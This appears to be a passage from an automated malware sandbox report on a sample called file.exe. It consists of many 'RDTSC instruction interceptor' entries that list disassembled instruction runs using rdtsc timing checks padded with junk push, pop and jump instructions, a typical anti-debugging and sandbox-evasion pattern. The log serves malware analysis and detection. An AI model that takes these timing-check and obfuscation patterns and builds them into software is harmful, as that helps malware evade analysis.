                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBCB second address: F1BBDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BBDF second address: F1BBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ECF7 second address: F1ED17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD4A4C54696h 0x0000000a popad 0x0000000b push esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD4A4C5469Dh 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ED17 second address: F1ED21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1ED21 second address: F1ED5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D3716h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FD4A4C54698h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F754 second address: F1F7CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, bx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FD4A4ED8668h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jng 00007FD4A4ED867Ah 0x00000033 jmp 00007FD4A4ED8674h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FD4A4ED8668h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, edx 0x00000056 xchg eax, ebx 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push ecx 0x0000005b pop ecx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F7CC second address: F1F7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F7D0 second address: F1F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jng 00007FD4A4ED8670h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20163 second address: F20167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20167 second address: F2016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2584E second address: F25853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25853 second address: F25870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8679h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25870 second address: F25874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A66 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26868 second address: F2686D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28832 second address: F2883C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD4A4ED8672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2694F second address: F26968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2883C second address: F2884B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD4A4ED8666h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26968 second address: F2696C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2696C second address: F26975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28F76 second address: F28F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F291C8 second address: F291DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A10F second address: F2A119 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4C5469Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F291DA second address: F291E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD4A4ED8666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C050 second address: F2C068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B141 second address: F2B157 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4ED8668h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jns 00007FD4A4ED866Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30038 second address: F30052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD4A4C546A3h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30052 second address: F30056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F301C2 second address: F301D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31139 second address: F31140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33DF7 second address: F33E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33E0E second address: F33E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31237 second address: F3123B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34D99 second address: F34D9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34D9F second address: F34DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jbe 00007FD4A4C5469Ch 0x00000012 sub dword ptr [ebp+122D1A9Bh], ecx 0x00000018 pushad 0x00000019 js 00007FD4A4C5469Ch 0x0000001f mov esi, dword ptr [ebp+122D35EFh] 0x00000025 popad 0x00000026 push 00000000h 0x00000028 jmp 00007FD4A4C546A1h 0x0000002d push 00000000h 0x0000002f mov edi, eax 0x00000031 or ebx, dword ptr [ebp+122D1B20h] 0x00000037 push eax 0x00000038 push esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC11 second address: F3DC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC1F second address: F3DC2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC2E second address: F3DC33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC33 second address: F3DC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD4A4C54696h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DD9F second address: F3DE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD4A4ED8679h 0x0000000d jo 00007FD4A4ED8666h 0x00000013 jmp 00007FD4A4ED8677h 0x00000018 popad 0x00000019 je 00007FD4A4ED8671h 0x0000001f jmp 00007FD4A4ED866Fh 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DE06 second address: F3DE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DE0A second address: F3DE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF6B second address: F3DF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43ABC second address: F43AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43AC2 second address: F43AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43C01 second address: F43C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49863 second address: F49867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4854E second address: F4855D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD4A4ED8666h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BA6 second address: F48BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BAA second address: F48BD0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4ED8674h 0x00000011 jne 00007FD4A4ED8666h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BD0 second address: F48BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BD8 second address: F48BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BE1 second address: F48BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48FBD second address: F48FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD4A4ED8674h 0x0000000a jnl 00007FD4A4ED8666h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48FE1 second address: F49011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD4A4C546A3h 0x0000000f jmp 00007FD4A4C546A3h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49011 second address: F49018 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4945A second address: F4945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4945F second address: F49464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D112 second address: F4D116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22834 second address: F22838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22838 second address: F01238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD4A4C5469Eh 0x0000000e jns 00007FD4A4C54698h 0x00000014 popad 0x00000015 nop 0x00000016 jnp 00007FD4A4C546A0h 0x0000001c lea eax, dword ptr [ebp+12497588h] 0x00000022 pushad 0x00000023 pushad 0x00000024 movsx ecx, di 0x00000027 jns 00007FD4A4C54696h 0x0000002d popad 0x0000002e xor dword ptr [ebp+122D2E25h], edi 0x00000034 popad 0x00000035 push eax 0x00000036 push esi 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a jne 00007FD4A4C54696h 0x00000040 popad 0x00000041 pop esi 0x00000042 mov dword ptr [esp], eax 0x00000045 call dword ptr [ebp+122D2971h] 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22EC3 second address: F22EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FD4A4ED8673h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F18 second address: F22F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnp 00007FD4A4C54696h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F32 second address: F22F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b mov dl, 5Fh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F56 second address: F22F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F5A second address: F22F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F5E second address: F22F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F64 second address: F22F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F6A second address: F22F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BA00 second address: F1BA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jbe 00007FD4A4ED8666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F185 second address: F8F18F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9922C second address: F99244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4C546A4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6526 second address: ED6535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED866Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4CB1 second address: FA4CB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA4CB6 second address: FA4CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7573 second address: FA7586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C5469Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7586 second address: FA758C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB30F second address: FAB331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB331 second address: FAB34C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD4A4ED8670h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB34C second address: FAB357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB357 second address: FAB35B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB35B second address: FAB35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB918F second address: FB9193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9193 second address: FB919D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4C54696h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1719 second address: FC171D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC171D second address: FC173D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FD4A4C546A4h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC009C second address: FC00A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0373 second address: FC039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 jno 00007FD4A4C54696h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f pushad 0x00000010 jmp 00007FD4A4C546A0h 0x00000015 push edx 0x00000016 pop edx 0x00000017 popad 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC039B second address: FC03B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c jns 00007FD4A4ED8666h 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC03B7 second address: FC03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FD4A4C54696h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC03C4 second address: FC03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0906 second address: FC0911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD4A4C54696h 0x0000000a popad 0x0000000b rdtsc
